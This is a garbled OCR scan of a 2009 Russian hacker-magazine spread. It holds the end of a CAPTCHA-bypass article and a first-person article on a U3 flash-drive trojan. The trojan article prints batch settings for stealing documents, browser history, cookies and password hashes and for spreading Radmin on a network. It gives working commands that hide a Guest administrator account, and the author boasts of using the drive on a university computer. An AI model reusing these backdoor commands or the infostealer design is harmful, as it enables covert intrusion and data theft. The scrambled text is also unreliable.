Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
Скачиваний:
12
Добавлен:
20.04.2024
Размер:
12.83 Mб
Скачать

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

>> взломw Click

 

BUY

 

 

w Click

to

 

 

 

 

 

m

to

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

g

.c

 

 

.

 

 

 

 

g

.c

 

 

 

p

 

 

 

 

 

 

 

 

 

p

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

ПРИМЕРУЯЗВИМЫХКАПЧ СЖИВНОСТЬЮ

ПРИМЕРСТОЙКОЙКАПЧИКOCR

ИСПОЛЬЗОВАНИЕЧЕЛОВЕЧЕСКОГО РЕСУРСАДЛЯОБХОДАCAPTCHA-ФИЛЬ- ТРОВ

5.Взломкапчи, засчетэксплуатациидругихуяз-

Идеяиспользованиячеловеческогоресурсавобщем

вимостейWeb. Ни для кого не секрет, что значения

видевыглядиттак. Создаетсянекийресурс, длякоторого

капчи в основном хранятся в БД, с которым работает

предполагаетсявысокаяпосещаемость. Такимресурсом

web-приложение. Если приложение содержит уязви-

обычностановитсябесплатныйпорно-сайт, накотором

мость, позволяющую при эксплуатации дотянуться до

пользователюпредлагаетсяввестизначениекапчив

хранимых значений captcha, задача по обходу ее ввода

обменнапросмотржелаемогоролика. Кромепорно-ресур-

будет сводиться к простой выборке нужных значений из

сов, дляреализацииподобныхцелейзамечательноподой-

соответствующей таблицы БД. Например, это реализуе-

деткрупнаясоциальнаясеть. Однакодосихпорсоциаль-

мо при эксплуатации уязвимости типа SQL Injection. На

ныесетииспользуютсяисключительнодляраспознавания

практике мне встречались подобные приложения. В

капчивблагихцелях. ЭтопроектReCAPTCHA, признанный

свое время даже был забавный случай, когда обследуе-

помочьвоцифровкетруднораспознаваемоготекстакниг.

мое web-приложение содержало вроде бы безобидную

Проектзапущенвтакихсоциальныхсетях, какFacebook,

уязвимость типа листинг директорий. В пространстве

Bash.org.ru идр.

корневой директории web-сервера располагались

ВМЕСТО ЗАКЛЮЧЕНИЯ

генерируемые изображения капчи, а в именах файлов

содержались их значения. Безусловно, это единичный

Надежностьлюбойсистемыбезопасностивзначительной

случай, но с учетом повсеместных уязвимостей типа

степенизависитоткачестваеереализации. Упракти-

SQL Injection данный вектор более чем применим для

ческихрешенийестьсвоинедостатки, которыемогут

обхода ввода капчи. Другое дело, будет ли это востре-

бытьиспользованызлоумышленниками. Вполноймере

бованным в случае, когда приложение содержит такие

этоправилоприменимоиксистемам, использующим

грубые ошибки.

CAPTCHA. Поэтомудажевоченьправильнойреализации

Кфундаментальнымпроблемамиспользованияcaptcha-

captcha-фильтраиспользованиетолькоегоодногоможет

фильтровотноситсявозможностьиспользованиячелове-

бытьнедостаточно. Хорошейпрактикойявляетсявдо-

ческогоресурсадляраспознаваниякапчи(«методлем-

полнениеккапчеиспользоватьидругиемеханизмы, за-

мингов»). Этозамечательныйиоченьэффективныйвектор

трудняющиеавтоматизированныедействия. Например,

обходаcaptcha-фильтров, которымсмоменташирокого

могутиспользоватьсяразличныевременныезадержки

распространенияэтойтехнологиисуспехомпользуются

привыполнениимножестваоднотипныхдействийза

спамерывсегомираикоторыйставитподсомнениесамо

короткоевремя, запрос, какой-либоинформации, извест-

применениеcaptcha-фильтров.

нойлишьавторизованномупользователюидр. z

XÀÊÅÐ 06 /126/ 09

 

INFO

info

Оптическоераспознаваниесимволов

— этооднаизсамых острыхпроблем примененияcaptchaфильтров.

Сиспользованием OCR можнолегко обходитьтекущиереализацииCAPTCHA натакихресурсах, как

Yandex, Google идр.

«Методлеммингов» ставитподсомнение эффективностьсамогоиспользования captcha-фильтров.

HTTP://WWW

links

caca.zoy.org/wiki/ PWNtcha

captchakiller.com

securitylab.ru/ contest/239642.php

057

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

>>m

 

w Click

to

 

 

 

взлом

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Троян

Flash

вмозгах

058

XÀÊÅÐ 06 /126/ 09

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

>>

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

взломw

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

o

m

 

w

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

.RU

/

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ДАНЬШИН

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ХАКЕРСКИ

 

 

 

 

 

 

 

/ YURIK

_YUROK2@MAIL

 

 

 

 

 

 

ПО

-

 

 

 

 

увла

 

 

V_

 

_N /

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ВАДИМ

 

M_E

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

информацию

 

 

/ DOCTOR

 

 

 

 

 

 

 

 

МЫСЛИТЬ

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ФЛЕШКУ

 

увести

 

, не

вызывая

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

сломать

 

 

УЧИМ

 

 

необходимо

 

сервера

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

бывает

 

 

 

 

 

 

 

или

возможности

 

-

 

 

 

 

 

 

 

 

 

 

 

нет

 

Частенько

 

 

,

компьютера

 

 

 

физический

 

 

 

 

 

... И

утебя

 

 

 

 

 

 

 

сообщ

,

 

 

 

 

ноутбука

 

 

 

как

иотсутствует

 

 

 

 

дельца подозрений

 

 

 

 

 

 

 

 

пригодится

 

 

 

 

 

 

 

случаях

 

 

задуманное

лишних

 

 

 

 

, равно

 

 

 

 

 

 

 

 

посети

 

 

втаких

 

 

выполнитьарютебе

 

 

компьютер

 

. Именно

 

 

 

тебе

 

 

. Япод

 

 

 

 

 

 

 

 

кнему

 

 

 

 

поможет

ситуации

 

 

 

 

 

доступ

 

 

всегда

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ник,

 

 

 

 

отсложившейся

 

 

 

 

 

 

 

 

 

 

 

 

который

 

 

 

.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

независимо

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

такого

 

сообщника

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Однаждывечеромясиделдома, почитывая за кружкой кофе очередной номер журнала «zакер», и вдруг наткнулся на статью про попытки взлома U3-флешки и софта под нее. Статья меня сильно заинтересовала тем, что флешка была не простая, а буквально золотая. И простор для хакерской деятельности на ней просто безграничен. Уже через день я приступил к опытам и изучению этого интереснейшего оборудования. Как оказалось, в самой системе таких флешек существовала уязвимость, которая потенциально позволяла взломщику сделать инъект в содержимое защищенного раздела флешки и заставить это содержимое исполняться на компьютере жертвы. К слову сказать, Большой Брат тоже не спит, поэтому все флешки такого типа перестали попадать к нам на прилавки уже через 2 недели. Сейчас их нет ни в одном магазине города. Но заказать такой U3-шный флеш-диск на 4 гига в инете нет никаких

проблем!

Порывшись в Сети, я не нашел никаких постов по этой теме и начал сам ковырять флешку, а именно — пробовал ее скопировать, разбить, переформатировать, изменить загрузочную область... В итоге, все мои попытки были обречены на провал, пока мне в руки не попал замечательный патч от

Kingston, в задачи которого входила пере-

прошивка моей флешки для совместимости

с Vista. И именно с его изучения началось

самое интересное.

ПОДАРОКХАКЕРУ— ПАТЧОТРАЗРАБОТЧИКА

Итак, у нас есть неизвестное приложение. При запуске оно опрашивает носитель, копирует данные с него к нам в комп, а после перепрошивки возвращает все по местам. Сопровождается этот праздник жизни всевозможными глюками и красивыми окошками, которые просто и незатейливо информируют юзера, что ему следует делать дальше. Пристальное внимание я обратил на сам исполняемый файл. Он заставил меня улыбнуться. Это незащищенное Winrar-приложение, имеющее тип самораспаковывающегося архива, в котором было необычное содержимое. Весь взлом состоял в распаковке и правке нужных ini-файлов блокнотом. Чем дальше я изучал их систему обновлений, тем больше мне это напоминало приколы из серии «почувствуй себя кул-хакером». В архиве лежали интерфейс обновлялки, функционал, который получал доступ к защищенному диску и iso-обра- зы — соответственно, для защищенного

диска, пустой перегородки между дисками и пустой рабочей части. Как принято в компании Kingston, все должно быть доступно для взлома, а это значило, что уже через 10 минут ковыряния в блокноте я создал

корректный файл автозапуска для защищенного диска. Он направлял выполнение кода сначала на мой обработчик, а затем уже на файлы LaunchU3-обработчика и так далее. Теперь пора поговорить об обработчике и исполняемом коде, определить концепции развития и общую структуру построения. В качестве языка для написания системы я выбрал командную строку Win32. Сделал я это по целому ряду причин, в числе которых — простота изучения этого языка и легковесность готовых исполняемых bat-файлов.

НЕПРИСТОЙНЫЕЗАПРОСЫ КОМАНДНОЙСТРОКИ

Преждечеммыполеземвдебри,давайрассмотрим основныеприколыкомандногоязыкаиметодыобходатехилииныхограничений.Перваяпроблема, котораядолгосотрясаламоймозг—этообращение крусскоязычнымпутямвпроводникеизпакетного файла.Если,допустим,сконсоливвести:

md c:\администратор\

XÀÊÅÐ 06 /126/ 09

059

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

>>m

 

w Click

to

 

 

 

взлом

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

СЛЕПАЯОТЛАДКАПОДСКРИПТОВПОДCMD ТАКПРИЯТНОЧУВСТВОВАТЬСЕБЯПОВЕЛИТЕЛЕМ

 

 

 

— тонадискедействительносоздастсяуказаннаявыше

 

 

 

папка, новнашемслучаенуженпакетныйфайл. Сле-

 

 

 

довательно, вместожелаемогорезультата, мыполучим

 

 

 

какую-токракозябрунанеизвестномязыке. Новсебудет

 

HTTP://WWW

 

прекрасноработать, еслитыпропишешькодировку1251.

links

chcp 1251

• Этоадресаинтер-

md c:\администратор\

нет-магазинов, где

 

 

продаютсяподобные

Скажупарусловобиспользованиивыводастрокивсвоихце-

флешки. Естьэкземп-

лях.Допустим,тыработаешьсокномкоманднойстроки,итебе

лярына1, 2, 4 ивроде

надополучитьчислоизответакоманды.Попробуемнаписать

быдажена16 гигов!

программу,котораямониторитсвязьскомпьютеромпосетиив

nix.ru

случаеобрывачто-нибудьвыполнит:

digitec.ru

 

mobiloff.net

rem программа опрашивает заранее известный

 

сервер и результаты пинга связывает с датой и

• Анаixbt.com/

временем

storage/flashdrives-

 

p17.shtml, произво-

rem # укажите сервер

дилсяинтересный

@set target=194.67.57.26

тест-обзорфлешек, в

chcp 1251

числекоторыхоказа-

color f0

ласьиU3.

title Блокнотик

 

chcp 866

 

:m1

 

@set pr=¢à¥¬ï=1¬á

 

@for /F "usebackq tokens=1,2,3,4,5,6,7*

 

delims= " %%1 IN ('ping %target% -n 1')

 

DO (echo %%4 %%5 %%6|findstr "¢à¥¬ï=»&&@

 

set pr=%%6)&(echo %%1 %%2 %%3 %%4 %%5

 

%%6|findstr "Џà¥¢ëè¥ á¡®©. ¥¤®áâ㯥."&&@set

 

pr=disconected)

 

@for /F "usebackq tokens=1,2,3* delims==

 

" %%1 IN (`echo %time%`) DO @set d_

 

t="Date_%date% time_%%1 ping_%pr%» & title

 

Date_%date% time_%%1 ping_%pr%

 

cls

 

@rem #если раскомментировать следующую

 

строчку, то будет создан лог на диске цэ

 

@rem #@echo %d_t% >> c:\realtime_log.txt

 

@echo %d_t%

 

@rem #в случае обрыва по умолчанию запускает

 

калькулятор

 

 

@if «%pr%»==»disconected» @start calc&&pause @goto m1

В этом коде используются поисковые запросы, выполненные в кириллических символах. Они всенепременно исказятся в какую-то внутреннюю кодировку командной строки. Чтобы это обойти, выдели нужное тебе слово для поиска в окне командной строки исполняющегося пакетного файла правой кнопкой мыши и вставь в блокнот. Это может быть буква, строка и прочие символы, за исключением управляющих символов командной строки вроде скобок. Но даже в этом случае ты можешь

использовать синтаксис циклов FOR, которым наплевать на содержимое их переменных, или просто скопировать заранее заготовленные спецсимволы из другого файла. Как пример, ищи на DVD мою систему пересоздания плейлистов, для построения которых мне необходимо пользоваться тем, что командная строка не переносит в принципе!

Также, из-за чрезмерной обширности вопроса, могу лишь упомянуть о возможности запуска скриптов как в режиме ожидания окончания предыдущего, так и в многопоточном режиме. Нет никаких проблем написания таких программ, которые при выполнении программировали бы свое потомство, притом, далеко не по линейным

алгоритмам. Нет проблем и с математикой, матрицами и прочими полезными вкусностями. Даже базу данных состряпать в ней можно без труда, хотя не без геморроя. Всегда к твоим услугам справка Windows по командной строке и моя почта. Я буду только рад вопросам, потому что хочу расширить доступный мне функционал командной строки ее же средствами. Считаю использование этого языка хорошим подспорьем для затруднения отладки как отдельных программ, так и всей системы в целом. В свое время я писал большой проект, на который неоднократно покушались другие программисты, но все они, в итоге, нервно курили в сторонке, так и не поняв сути моих скриптов.

СОЗДАЕМСВОЙ ИСКУССТВЕННЫЙ ФЛЕШ-ИНТЕЛЛЕКТ

Нарукахунас— вызовнаисполнениезащищенного файла, которыйпоступилотприложениясзащищенного раздела. Сначаламыопределимбуквудиска, накоторый подключиласьнашафлешка, иоткудаейсужденоработать. Ясделалэто, используяобычныеIF’ыипередалих параметромвпакетныйфайл, находящийсянаосновном

060

XÀÊÅÐ 06 /126/ 09

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

>>

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

взломw

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

o

m

 

w

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

ДРУЖЕЛЮБНЫЙРЕЖИМЗАПУСКА ВОТТАКЯКОГДА-ТОПИСАЛRAR-ТРОЯНА

Глюки, выявленные тестированием

ИзначальносистемаписаласьподWindowsXP Home, нопослееетестированиянаWindowsXP Pro выявились некоторыеглюки. Например, системадолгоиисправно работаланавсехкомпах, покасомнойимоимтоварищем неслучиласьследующаяистория. Однаждымайским днемнамвыпалавозможностьпопастьвдругойкорпус родногоуниверситетаиполучитьдоступккомпьютеру, черезкоторыйтакилииначепроходятвсеметодички, дипломныеработыивкусности, накоторыхможнобыло бынеплохонавариться. Придявкорпус, япередалприятелюфлешку, послечегомыпошли«надело». Сначала меня, каксейчаспомню, немногоозадачиланадпись Windows2000 наэкранемонитора, ноужечерезмгновениефлешкавеселоибодромигаласвоейлампочкойв гнездеUSB. Флешканезахотелаатаковатькомпьютер, ия, недолгодумая, врубилпринудительнуюатаку. Время шло, флешкаработала, амывыполнялисобственното, зачемнаснаправиливэтототдел. Послеокончания работымыснетерпениемвернулисьвродныекорпуса. Ода! Флешкасработалачудесно! Посетимыпрониклив однуизсамыхзащищенныхмашинискайфомвглядывалисьвдействительноинтересныефотографиисотрудниц отдела. Итакпродолжалосьдосамогообрывасвязи. «Ну, ничего— завтравсескопируем», — сказалятоварищу, и

мыпошлиподомам. Наследующееутромоегодругаподнялипотревоге– надобылосрочноявитьсявтототдел, чтобыподправитькакие-тополя. Почуявнеладное, мы подключилиськвузовскойсетиисталипытатьсязайтина тоткомпьютер. Насждалоблом– компьютерпинговался, нонеотвечал. Сильноозадаченныемыпошливдругой корпус.

Придя, мынаблюдалиследующуюкартину: компьютер,

возленегонесколькочеловек. Онисмотрелинанас глазамиманьяков, которыедавноникогонеубивали. На всепоследующиевопросымысделалилицакирпичоми сталинестинупростополнуюахинеюпроинтернет, его развитиеивирусы. Насвыслушалииповерили. Когда мыспросили, ачтожеслучилось, намрассказали, что умашинывнезапнослетеливсепароли. Онивызвали местногосисадмина, которыйдобрыхтричасавозилсяс табличкойвводапароля, и, видимо, совсемотчаявшись, наугадввелимяпользователя«Гость» инажал«Enter». Системанеожиданнопорадовалаегонетолькоуспешнымвходом, ноиадминскимиполномочиямивпридачу. Воттакиепироги.

разделедиска«JUMPER.BAT». Внемяопределилрежим работыитактикуповедения. Соответственно, ямогуили вызватьатакующиймодуль, илиже, например, открыть режимхозяина-владельцафлешки, вкоторомиграет музыка, запускаетсяаськаикопируютсялогисовзломанныхмашинпрямонамойрабочийстол! Допустим, что флешкапопалавлапынегодяя. Предлагаюрассмотреть лишьнекоторыемоментыфайла«WARBOT.bat», например, егоначальныенастройки:

set make_tir_in_allusers_autorun=1 — создавать ли Трояна в автозагрузке всех пользователей (0\1)

set make_tir_in_user_autorun=1 — создавать ли Трояна в автозагрузке текущего пользователя (0\1)

set stealth_konsol=0 — копировать ли с компьютера жертвы файлы консолей управления? (0\1)

set stealth_histiry_ie=1 — копировать ли историю посещения браузера IE? (0\1)

set attack_for_guest=1 — производить ли атаку на гостя? (0\1)

set stealth recents=1 — копировать ли ярлыки недавно открытых документов? (иногда помогает «осмотреться») (0\1)

set stealth_system_info=1 – копировать ли логи со счетчиков системы и значения переменных? (0\1)

set stealth_md5_passwords=1 — пытаться ли скопировать ìä5-õåøè паролей с системы? (0\1) set type_of_file_for_stealth=.doc .txt

указывает файлы, которые должны быть сграблены с компьютера на флешку

set type_of_file_for_filtration=.lnk .LNK

.mp3 .wma .vob .wav .mid .midi .mp4 .avi .ogg

.mpeg .mpg .cda %usbdisc% winword WINWORD

WARNING

warning

Внимание!Информацияпредставлена исключительносцелью ознакомления!Ни автор,ниредакцияза твоидействияответственностиненесут!

DVD

dvd

Надискетебяожидает моямега-система, атакжевсенеобходимыематериалы, касающиесявсех аспектовразработки подобныхприложе-

ний, скриптования подWin32 ипрочие вкусности, описанные встатье. Тебеостается лишьвзятьиуложить предоставленныйматериалпопапочкам.

Срочно в номер!

Совсемнедавносталоизвестно, чтоможносделатьчу- до-флешкуизлюбогонакопителя. Теперьнеобязатель- нопокупатьдорогуюU3-флешку— сойдетдажеmp3-

плеер! Универсальныйсофтдлямодификациифлешек,

загруженныйссайтаhttp://flashboot.ru/index.php?nam e=Files&op=cat&id=6&pagenum=2, язаботливозалил надиск. Какегоюзать— разберешьсяврамкахмоего домашнегозадания;). Илипишинапочту— помогу.

XÀÊÅÐ 06 /126/ 09

061

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

>>m

 

w Click

to

 

 

 

взлом

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

U3-ШНОЕМЕНЮМОЕГОДЕВАЙСА

СОЗДАЕМГЛОБАЛЬНЫЕПЕРЕМЕННЫЕДЛЯРАБОТЫ НАШЕЙФЛЕШКИ

Cookies cookies .jpeg .jpg .bmp .gif .pic .pict .ico

фильтры, чтобы не перегрузить флешку всяким хламом rem #.jpeg .jpg .bmp .gif .pic .pict .ico .gif .html

.htm — другой набор фильтров под другие задачи

set find_evristic_analyze_in_file_types=1 — включить ли искусственный интеллект для типов фаилов? (0\1) set find_evristic_analyze_in_file_folders=1 — дать ли искусственному интеллекту доступ к структуре папок? (0\1)

set recent_folder_for_analyze=%homedrive%%homepath%\ Recent\

set no_find_documents=0 — мне не искать текстовые документы вообще?

set no_copy_all_documents=0 — вообще пропускать копирование каких-либо документов?

set not_attacking=0 — не атаковать?

set no_use_radmin=0 — мне нельзя устанавливать радмин трояна в целевую систему?

set no_use_LanMod_for_Radmin=0 — мне не пытаться устанавливать радмин по сети на соседние машины?

set use_only_radmin=0 — вся атака должна состоять только из установки радмина?

set no_create_message=0 — в процессе работы не использовать место на диске для создания сообщений

set no_display_message=0 — про пользователя совсем забудем? Ну и правильно — ему нечего знать не надо

Отдельнохотелосьбырассказатьобатакенагостя, котораяявляется гвоздемнашейпрограммы:

if %attack_for_guest%==0 goto m3 — исключающее или chcp 1251 — подключим кодировку для кириллицы

net user гость /active:yes — активируем учетную запись гостя

net localgroup администраторы гость /add — сделаем гостя равным администратору по правам

@reg add «HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows NT\CurrentVersion\Winlogon\SpecialAccounts\ UserList» /v гость /t reg_dword /d 0 /f — скроем появившуюся учетку с глаз долой от юзера

net user гость 1234 — приправим паролем по вкусу

ОБУДОБСТВАХНЕЗАБЫВАЕМ

Ну, хорошо, мывкакой-тостепениудовлетворилинашизапросыпо взлому, нопомимовсегопрочего, моясистемаобладаетмассойприятныхфенечекифишек, таких, какавтоматизированныйвходваську. На дискетыслегкостьюдолженнайтифайл«pqp.bat».

Именноонуправляетвводомпароля. Этотскриптпросматриваетсвое

062

XÀÊÅÐ 06 /126/ 09

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

>>

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

взломw

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

o

m

 

w

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

ФЛЕШКАВМАГАЗИНЕСНЕТЕРПЕНИЕМЖДЕТСВОЕГОПОКУПАТЕЛЯ

телоипоследовательноосуществляетклавиатурныйввододносимвольныхкомментариеввтекстепрограммы. Еслираскидатьпоэтомуфайлу комментариитакимобразом:

rem V rem 1 rem 3 rem 3 rem k rem g rem r rem s

— тонавыходемыполучимпароль«V133kgrs». Витоге, пассхранится внестандартномвидеинетребуетпривводенашегоучастия. Следующая приятная фишка: если на флешке окажется места меньше заранее определенного объема, то автоматически откроется утилита для удобного рассмотрения содержимого диска «scanner.exe». Ты меломан, как и я? Тогда тебя порадует встроенная поддержка плейлистов от Windows Media Player и возможность их пересоздания специальным скриптом или вовсе автоматически. Вся музыка для этого заботливо укладывается в папочку MUZON. Если у тебя включен идентификатор типа «% BASE%==BASE» , то система автоматически скопирует тебе на рабочий стол в отдельную папочку все награбленное добро с флешки. Я в свое время успешно ее использовал для решения повседневных задач системного администратора, вроде полностью автоматизированной установки и настойки, например, антивирусов на компьютерах юзеров.

